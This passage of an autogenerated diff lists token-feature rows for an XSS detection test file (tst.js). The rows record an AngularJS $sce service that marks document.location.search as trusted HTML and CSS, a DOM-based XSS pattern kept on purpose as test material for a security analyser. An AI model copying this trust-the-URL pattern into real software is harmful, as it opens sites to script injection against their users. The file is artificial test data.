URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:82:34:82:41 | location | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:82:34:82:41 | location | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:82:34:82:41 | location | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:82:34:82:41 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:82:43:82:48 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:82:43:82:48 | search | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:82:43:82:48 | search | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:82:43:82:48 | search | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:82:43:82:48 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:83:9:83:12 | $sce | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:83:9:83:12 | $sce | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:83:9:83:12 | $sce | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:83:9:83:12 | $sce | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:83:9:83:12 | $sce | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:83:9:83:27 | $sce.trustAsUNKNOWN | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:83:9:83:27 | $sce.trustAsUNKNOWN | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:83:9:83:27 | $sce.trustAsUNKNOWN | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:83:9:83:27 | $sce.trustAsUNKNOWN | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:83:9:83:27 | $sce.trustAsUNKNOWN | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:83:9:83:53 | $sce.tr ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:83:9:83:53 | $sce.tr ... search) | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:83:9:83:53 | $sce.tr ... search) | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:83:9:83:53 | $sce.tr ... search) | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:83:9:83:53 | $sce.tr ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:83:9:83:53 | exceptional return of $sce.tr ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:83:9:83:53 | exceptional return of $sce.tr ... search) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:83:9:83:53 | exceptional return of $sce.tr ... search) | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:83:9:83:53 | exceptional return of $sce.tr ... search) | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:83:9:83:53 | exceptional return of $sce.tr ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:83:14:83:27 | trustAsUNKNOWN | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:83:14:83:27 | trustAsUNKNOWN | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:83:14:83:27 | trustAsUNKNOWN | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:83:14:83:27 | trustAsUNKNOWN | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:83:14:83:27 | trustAsUNKNOWN | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:83:29:83:36 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:83:29:83:36 | document | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:83:29:83:36 | document | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:83:29:83:36 | document | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:83:29:83:36 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:83:29:83:45 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:83:29:83:45 | document.location | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:83:29:83:45 | document.location | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:83:29:83:45 | document.location | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:83:29:83:45 | document.location | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:83:29:83:52 | documen ... .search | CalleeFlexibleAccessPath | $sce.trustAsUNKNOWN | | autogenerated/Xss/DomBasedXss/tst.js:83:29:83:52 | documen ... .search | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:83:29:83:52 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16283,6 +113600,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:83:29:83:52 | documen ... .search | enclosingFunctionName | service#functionalargument | | autogenerated/Xss/DomBasedXss/tst.js:83:29:83:52 | documen ... .search | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:83:29:83:52 | documen ... .search | receiverName | $sce | +| autogenerated/Xss/DomBasedXss/tst.js:83:38:83:45 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:83:38:83:45 | location | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:83:38:83:45 | location | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:83:38:83:45 | location | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:83:38:83:45 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:83:47:83:52 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:83:47:83:52 | search | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:83:47:83:52 | search | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:83:47:83:52 | search | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:83:47:83:52 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:84:9:84:12 | $sce | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:84:9:84:12 | $sce | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:84:9:84:12 | $sce | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:84:9:84:12 | $sce | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:84:9:84:12 | $sce | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:84:9:84:20 | $sce.trustAs | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:84:9:84:20 | $sce.trustAs | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:84:9:84:20 | $sce.trustAs | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:84:9:84:20 | $sce.trustAs | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:84:9:84:20 | $sce.trustAs | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:84:9:84:57 | $sce.tr ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:84:9:84:57 | $sce.tr ... search) | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:84:9:84:57 | $sce.tr ... search) | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:84:9:84:57 | $sce.tr ... search) | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:84:9:84:57 | $sce.tr ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:84:9:84:57 | exceptional return of $sce.tr ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:84:9:84:57 | exceptional return of $sce.tr ... search) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:84:9:84:57 | exceptional return of $sce.tr ... search) | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:84:9:84:57 | exceptional return of $sce.tr ... search) | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:84:9:84:57 | exceptional return of $sce.tr ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:84:14:84:20 | trustAs | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:84:14:84:20 | trustAs | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:84:14:84:20 | trustAs | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:84:14:84:20 | trustAs | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:84:14:84:20 | trustAs | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:84:22:84:25 | $sce | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:84:22:84:25 | $sce | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:84:22:84:25 | $sce | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:84:22:84:25 | $sce | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:84:22:84:25 | $sce | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:84:22:84:30 | $sce.HTML | CalleeFlexibleAccessPath | $sce.trustAs | | autogenerated/Xss/DomBasedXss/tst.js:84:22:84:30 | $sce.HTML | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:84:22:84:30 | $sce.HTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16291,6 +113648,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:84:22:84:30 | $sce.HTML | enclosingFunctionName | service#functionalargument | | autogenerated/Xss/DomBasedXss/tst.js:84:22:84:30 | $sce.HTML | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:84:22:84:30 | $sce.HTML | receiverName | $sce | +| autogenerated/Xss/DomBasedXss/tst.js:84:27:84:30 | HTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:84:27:84:30 | HTML | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:84:27:84:30 | HTML | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:84:27:84:30 | HTML | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:84:27:84:30 | HTML | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:84:33:84:40 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, 